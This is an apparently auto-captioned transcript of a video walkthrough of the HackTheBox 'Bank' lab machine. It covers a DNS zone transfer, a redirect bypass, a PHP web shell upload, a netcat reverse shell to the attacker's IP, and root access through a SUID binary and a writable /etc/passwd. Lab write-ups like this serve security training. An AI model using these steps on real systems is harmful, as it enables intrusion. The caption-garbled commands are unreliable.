HackTheBox - Bank

hey guys what's going on this is if SEC and we'll be doing the bank machine from hack the box this box got a little bit of hate because there's some guesswork involved to get the initial webpage but once you do that there's almost two ways to do every other step which is awesome one way that was intended the other way that is unintended turns out writing software is hard and then writing software that's intentionally vulnerable is even harder so we're gonna be jumping right in to this box so you know the drill we're gonna end map the box with save scripts and numerous versions output all formats and then the IP address of Bank which is ten ten ten twenty nine already ran this so let's just look at the results we do see it listening on three ports twenty two SSH fifty-three DNS this is odd normally DNS is only UDP it uses TCP in cases when the response is greater than 512 bytes I believe and that happens normally in DNS zone transfers which are normally disabled and rare cases DNS SEC or ipv6 but most time when you see DNS on fifty-three TCP and not just UDP zone transfers may be enabled so that is something to look into then you of course have Apache listening on port 80 so let's begin by poking at the DNS I'm going to open up nslookup type server ten ten ten twenty nine to change it to the bank's DNS port I guess and we're gonna test a few things I normally test like one 2700 one to see what it responds with maybe you'll get lucky and it says a hostname they're exposed to something next thing is the IP address of the server so ten ten ten twenty nine reverse lookups are not enabled so we don't get a result there we think the name may be banked on a CB because that's what hacked the boxes portal says so we're gonna try that and we do see it respond a few other things I may try running is DNS recon so I'm gonna do DNS recon - range or - r1 27000 slash 24 what that's going to do is take this octet and just go 1 to 255 if it was slash 16 this one and this one would go 1 to 255 and then slash 8 all three of these a little bit of networking there and then we have to specify the name server so 10 10 10 29 and we see no extra responses I could flip this to a 1 because a lot of host files also include like 127 0 1 1 and don't get anything the last thing let's see what else is on that 10 subnet and we get nothing so let us try a DNS zone transfer so I'm going to dig axfr this is the flags to do a zone transfer and then at 10 10 10 20 9 the DNS server get a response but nothing so zone transfers are not enabled for the root zone the next thing let's specify Bank HTTP as the zone and we get the zone transfer being successful the only thing this really tells us is we have a few extra name servers or subdomains we have Chris Bank HTTP and s Bank HT b and w WP h DB so few extra domain names we're gonna add those to a host file ah actually we have DNS so why don't we just add them to resolve kampf and specify we want to use Bank as a DNS server so 10 10 10 29 and then I can ping Bank HT v now awesome so that's it for the DNS portion and now we'll be digging into the web let's open up Firefox and go to 1010 1029 we get the Apache default index page we see right here Apache to Ubuntu default and if we went to Bank dot HDB we get something completely different so if you're not familiar with virtual hosts routing we'll show you how it works real quick let's just send this request into burp then press control artists and the store Peter right-click go we send this request we get the Apache to Ubuntu default page virtual host routing works by this host header so I'm going to change this to bank htb and then send go we get something completely different a HTTP redirect which is odd to see when you also see a bunch of source down here this is a vulnerability and in itself and we'll go into this and just a little bit but in virtual host routing Apache just examines this host field and then based upon the value sends you to a different web page so that's how that all works the first thing I would be doing is testing a bunch of sequel injection here this isn't vulnerable I don't believe so I'm just gonna skip that you should look at other videos to see how sequel map works and just some things I do to test it so we don't have wall again the next step would be to run a der buster we've already shown you do Buster I didn't like Doh Buster because I went back in the video I had used it and verified that recursive wasn't checked and for some reason it still did recursive so I was trying to use go Buster which is like door buster written go but it doesn't do one thing that I need for this video so we're gonna be using derp search so CD / opt derp search I just ran a git clone if you just Google do such order search Python and you'll come to the get page and then just download it so we do Python there's such two pi and we see it requires Python 3 so I'm going to specify Python 3 and then URL target is missing so let's just do a dash H to get all the flags so what we want to do is we'll specify a URL so - you we want we're going to want to specify extensions with - e because we know this is a PHP page so we're going to take a word list and that's gonna search the word list too to get directories and that's gonna take every entry in that word list append PHP to try to get files so we definitely want that - e - W the word list - F force extensions so force extensions for every word list entry like in do a Buster we're gonna want that recursive we don't want that this is why we're not actually using der Buster because this makes it take forever threads we can use some threads header if we wanted to put a referral or user agent we don't have to specify the host header because it automatically does that when we specify bank dot HTTP in the URL so let's run this it was Python 3 der search word list so user share wordless go Buster and it's not let me show you all the files in this directory so copy this so I normally run this directory list 2 - 3 - medium this will take forever so I took the entries I wanted and then created some fake entries and put them in Bank vid so you won't have that directory but that's what I'm gonna be using because I want to go fast so - W user damn it copy that user share word list do a Buster Bank - vid and then what else do we want we want extensions for PHP we want force extensions we want to do let's say 20 threads and the - you for URL and I think that's what we want so running this and we see it doing a bunch of requests and the output here so we have a balance transfer directory these 300 requests and we already saw what that is but it's odd to see seven kilobytes it should just be bytes because it should just redirect you and that's it shouldn't have anything below that redirect we also see the same thing for support dot PHP so balance transfer was the intended way to get the machine so we're gonna do that way first and then I'll show you these abusing actually no we're gonna reverse that we're gonna stir it here show you what you could do and then ballot transfer because this will log you in to the web application legitimately so if we go back to a Brooke and what we want to do is tell a browser that this isn't 302 found this is 200 okay because when a browser sees this it's gonna afford us to the redirect which would be login dot PHP and where does that should have a location oh yeah there's the location I just can't read so the browser sees 302 found pulls location and then goes to it so we can verify that behavior by just going burp let's try to intercept off or intercept on and we're gonna intercept server responses so refresh this intercept so we're gonna get login so wait now I want to get index index dot PHP let's do that so we get index we get this 302 found then a browser goes yep I'm gonna fold that request get login and then we get to login page so what would have happened if we do index dot PHP I turned intercept off not a habit so we're gonna get this index and instead of the server telling us 302 found what if it just said 200 okay so a browser did not go to this location header we get some four fours but completely different so what we can do in burp is just automatically rewrite all the responses so we're gonna go down to match into place and I'm gonna say on the let's see should be response header yeah response header right there we're gonna match 301 or two and what was the other piece of that had a so they're two found so spawn set a three zero one or two found and when it's place it with 200 okay and we'll give the comment of ignore redirect how much of this is all caps or if it matters but we're gonna enable regular expressions because this is regular expression do the one or two click OK and now let's just go to index dot PHP and see if it redirects us it does not so now we can also do support dot PHP and get to this page so that is the unintended way to get to support dot PHP once you do this this is how you upload a shell we'll be doing that shortly but I want to show you the intended way next so let's go back to der search we have this balance transfer directory so let's just go there and before we do anything let's disable a rewrite because we don't need this anymore so let's go to my bookmarks balance transfer and we get a bunch of files if we try to click one of these files we just get okay encrypt success and a bunch of information if we try to basics for decode this it doesn't work it's encrypted so that's a dead end if you scroll around you'll see one of these is not 580 some bytes it is like 200 so the easiest way to do this is we're going to copy this let's go back to or hack the box folder and we're gonna do a double you get recursive and then the URL and what this is gonna do is download everything we just saw right here the other way to do this if you have book pro is go into target let's go down to balance transfer add this to scope and we're adding the balance transfer folder I'm going to spider the powers transfer folder and we'll see all these go from grey to black which means we have a response and then click on this filter and then say encrypt success and negative search so don't show us anything that has a response of encrypt success okay I guess it's filtering hopefully yeah so it's now removing all this and while that's doing that we can see if W gets finished they have them so right now we're just waiting for either W get to finish or book to finish filtering because one of these requests does not have encrypt success so unfortunately there's a lot of requests like a lot so it could take a little bit let's just go back here and I'm gonna cheat I think it's 280 something it's a 284 no it's this size we have to look at one of these files is not 500 bytes it's 200 and the reasoning is the encryption just made it a bit bigger so come on come on where is it it's like finding a needle in a haystack well hopefully something finished let's see w gets finished so we go into the folder it created Bank ty h to be balanced transfer we have all the files let's get rid of these index dot HTML s because they don't matter and we can just do a word count and specify - see four characters on all these files and we see that 580 so let's just sort numbers I know we sorted it by file size and then we'll add the earth flag for a verse and we get 257 here and I change the size of this window that's annoying and Lessing this file gives us an email address and password so didn't finish it did as well so let's disable this and we'll begin by logging in so email chris at banked on HTTP and the password is h to be bank password well again and we get to the dashboard finally so the next thing what to do would be just I guess click around we go to support we get the support portal and let's just delete these files I forgot to revert this machine but so let's just try uploading something so test test choose file I want to go to locations so I think yeah I have all my shells in OP shell and would do PHP I'm just going to do this corner gift so it sets my metadata and all that to be an image because images are generally accepted so don't intercept on submit and I'm gonna get rid of this and we leave that gif 89 and the reason I do that just like the popcorn video if we create a file and we have gift 8 at the top and then specify anything we do a file against that and the magic byte says it's an image so if it's using magic bytes to test if we're uploading an image having that gif 8 the first few bytes will fix that so I leave that in I'm going to do PHP echo system request oops ACK so a basic PHP web shell just running commands one at a time send this over to repeater and we'll change add dot PHP there so for this request off we don't need a intercept responses anymore so let's undo that and we get oh you can only upload images so that's odd going to repeater let's see exactly what happened we had or let's just upload corners dart gif to see if it was that dot PHP we appended that caused an error does render work so we do see it uploaded it when we didn't have that PHP but when we're scrolling through this we saw an HTTP comment debug I added the file extension dot HTV to execute as PHP for debugging purposes only so and stuff gift let's do htb upload render and we see another file uploaded awesome so the f5 we're not intercepting go here refresh the page I'll just do that and we see the two files going over these attachment we can do see that Corner's htb has been uploaded and if we add the upset command that we coded we do have code execution so the next step would be to do a reverse shell so we can do like a witch and see we do cnc is so NC's netcat let's just try net cat slash bin slash sh and we'll specify nouvion if config 0 v NP 881 my IP address 1010 1441 that's what I wanted and we get a shell so we're gonna do the Python - C input PT y PT why not spawn slash bin slash bash actually before I do that I can prove I have a shelf we just do Who am I www data so it's just not giving us the prompt so now I can run - okay now I'm going to background this with ctrl Z s TTY raw - echo and then type FG Anna and I have a full shell with like to completion which makes life easy term vomit not set so that's that term let go trim screen export term equal screen and now I can clear to awesome so now for privacy the first thing I do is I wanted to see if I can figure out how that encrypt function worked so I'm going to grab recursively which will grep all these files in here for encrypt because it put that in those files if I do dot and I'm gonna do a grep dash V to exclude the balance transfer there's probably a more elegant way to do this but this is the quick way you don't see this in any of the PHP files so I'm guessing something else and Cripps it not the PHP files no idea what does never found it but I guess that's one of the reasons people don't like this machine because the encryption is kind of a rabbit hole there's a lot of files to go through so that's a dead end we stopped looking at that the next thing I poked around these PHP files and we see the user dot PHP it wouldn't matter if I just kept that and these are the credentials to MySQL so I would first MySQL - you root log into MySQL and then oh my god I'm drawing a blank on how to drop to a shell that's it do that drop to a shell we don't see us escalate to root sometimes you'll get lucky and when you execute the shell from my sequel it's configured to just allow you to be the user that's running my sequel and sometimes my sequel is running his route very quick check just do that the next thing is I'll try to SH to banked on HT be as route and we'll use that password I had copied back here that secure password and we get permission 9 so that's not routes password we're gonna cat @c passwd and we see let's see what is the user Chris so we'll just try that for Chris to see if we get out of this ww user and we don't so we don't have Chris's or routes password the next thing of course would be just to do the enumeration scripts so I'm gonna press ctrl a and then double quote to split that horizontally and we're gonna run Python HTTP server so flash opt Linux and we have a few enumeration scripts if you just google these you can pull them you should be familiar with all of them so python sham simple HTTP server and then we're just gonna W get on my IP so 10 10 1441 8000 and we specify that - our flag again and we see it downloaded all the files so we can stop this simple HTTP server and go into this so we have linen um Linux probe check and UNIX proof check so the first one we run is when enum oh man that just went slow and we'll see what this gives us as output we actually saw someone ssh this Chris I guess someone guys password so let's go to the top I guess hold on while we go through this lets nevermind I was gonna open up another session and run a different script but this UNIX probe check should be all we need so the top okay colonel information 2017 kernels been updated so it's not vulnerable things like dirty cow so don't you have to go there we're running Ubuntu 14 for Miss and root I don't even know Lucas's password is that's odd but it's on a 192 subnet so does it look like it's a player so it's searching for potential users on the box and Etsy pass to B D where D saw this route and Chris home directory permissions C cron jobs I don't see any Cron's that don't look normal and I don't have write access to any of them or cron stuff IP stuff looking at listening sockets so my sequel I don't see any services that look like we can abuse just listening on localhost UDP that's DNS 53 running processes service permissions it's going through Apache directory we already look at this so many encrypted files okay so that's the end of the Apache useful files and map on this box awesome netcat w get GCC configuration files Oh miss this can we read or write sensitive files we have write access to Etsy passwd so this is a good one I think in an unintended Prive ask so keep that one in mind and it doesn't look like that found set UID whit so we're going to run find slash I think - perm 4000 this gonna look for files that have the set UID bit set if we do Lin proof checkup I it'll also run this but it takes a while so let's just see if we can speed it up by running this manually and hope I did this correctly yes so we do see the ver HB bin emergency so let's see who owns this so we could have just done like I think - exact whoa that's weird let's copy this and clear something happened with my terminal window okay let's just do LS - away my command was too long and it freaked out so we see sticky is set and root owns this so if we just execute this to see what happens it just drops us to a shell immediately and we become root effective user ID and if we just do LS / root Bren the other way would be we can just edit this passwd file so if we do open SSL passwd - - help we can see the algorithms and what this is doing is I want to create a encrypted password I'm going to put that in the past WD file so if we just do password as if sec it gives us the standard UNIX password algorithm encrypted if we had done the - 1 flag to specify md5 you may be more familiar with that format but since it says we have write access to passwd let's try writing so change that but the password where it should be and then we try writing it cannot create backup file so s says add exclamation point to override and then if we su - root and type if sec we get in and we could have also just ssh banked on HT be hip sec and login so when passwd is ward writable just write a password and login and yeah hope you enjoyed the video take care